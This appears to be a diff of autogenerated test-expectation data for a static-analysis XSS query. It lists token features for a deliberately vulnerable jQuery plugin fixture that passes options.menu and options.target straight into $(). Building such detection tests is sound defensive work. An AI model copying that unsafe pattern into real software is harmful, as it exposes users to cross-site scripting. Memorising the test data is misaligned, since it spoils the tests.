contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23910,6 +156407,18 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:22:105:3 | {\\n\\t\\t\\tme ... in'\\n\\t\\t} | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:22:105:3 | {\\n\\t\\t\\tme ... in'\\n\\t\\t} | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:22:105:3 | {\\n\\t\\t\\tme ... in'\\n\\t\\t} | receiverName | $ | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:7 | menu | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:7 | menu | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:7 | menu | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:7 | menu | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:22 | menu: '
    ' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:22 | menu: '
    ' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:22 | menu: '
    ' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:22 | menu: '
    ' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:22 | menu: '
    ' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:22 | menu: '
    ' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:22 | menu: '
    ' | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:4:103:22 | menu: '
    ' | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:10:103:22 | '
    ' | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:10:103:22 | '
    ' | InputAccessPathFromCallee | 0.menu | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:10:103:22 | '
    ' | InputArgumentIndex | 0 | @@ -23918,6 +156427,18 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:10:103:22 | '
    ' | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:10:103:22 | '
    ' | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:103:10:103:22 | '
    ' | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:9 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:9 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:9 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:9 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:23 | target: '.my_plugin' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:23 | target: '.my_plugin' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:23 | target: '.my_plugin' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:23 | target: '.my_plugin' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:23 | target: '.my_plugin' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:23 | target: '.my_plugin' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:23 | target: '.my_plugin' | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:4:104:23 | target: '.my_plugin' | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:12:104:23 | '.my_plugin' | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:12:104:23 | '.my_plugin' | InputAccessPathFromCallee | 0.target | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:104:12:104:23 | '.my_plugin' | InputArgumentIndex | 0 | @@ -23933,18 +156454,218 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:105:6:105:12 | options | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:105:6:105:12 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:105:6:105:12 | options | receiverName | $ | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:17 | $(options.menu) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:17 | $(options.menu) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:17 | $(options.menu) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:17 | $(options.menu) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:17 | exceptional return of $(options.menu) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:17 | exceptional return of $(options.menu) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:17 | exceptional return of $(options.menu) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:3:106:17 | exceptional return of $(options.menu) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:11 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:16 | options.menu | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:16 | options.menu | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:16 | options.menu | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:16 | options.menu | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:16 | options.menu | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:5:106:16 | options.menu | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:13:106:16 | menu | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:13:106:16 | menu | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:13:106:16 | menu | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:106:13:106:16 | menu | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:19 | $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:19 | $(options.target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:19 | $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:19 | $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:19 | exceptional return of $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:19 | exceptional return of $(options.target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:19 | exceptional return of $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:3:107:19 | exceptional return of $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:11 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:18 | options.target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:18 | options.target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:18 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:18 | options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:18 | options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:5:107:18 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:13:107:18 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:13:107:18 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:13:107:18 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:107:13:107:18 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:24 | $.fn.my ... efaults | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:24 | $.fn.my ... efaults | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:24 | $.fn.my ... efaults | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:110:24 | $.fn.my ... efaults | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:113:2 | $.fn.my ... gin'\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:113:2 | $.fn.my ... gin'\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:113:2 | $.fn.my ... gin'\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:2:113:2 | $.fn.my ... gin'\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:4:110:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:4:110:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:4:110:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:4:110:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:7:110:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:7:110:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:7:110:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:7:110:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:17:110:24 | defaults | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:17:110:24 | defaults | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:17:110:24 | defaults | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:17:110:24 | defaults | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:28:113:2 | {\\n\\t\\tmen ... gin'\\n\\t} | assignedToPropName | defaults | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:28:113:2 | {\\n\\t\\tmen ... gin'\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:28:113:2 | {\\n\\t\\tmen ... gin'\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:28:113:2 | {\\n\\t\\tmen ... gin'\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:110:28:113:2 | 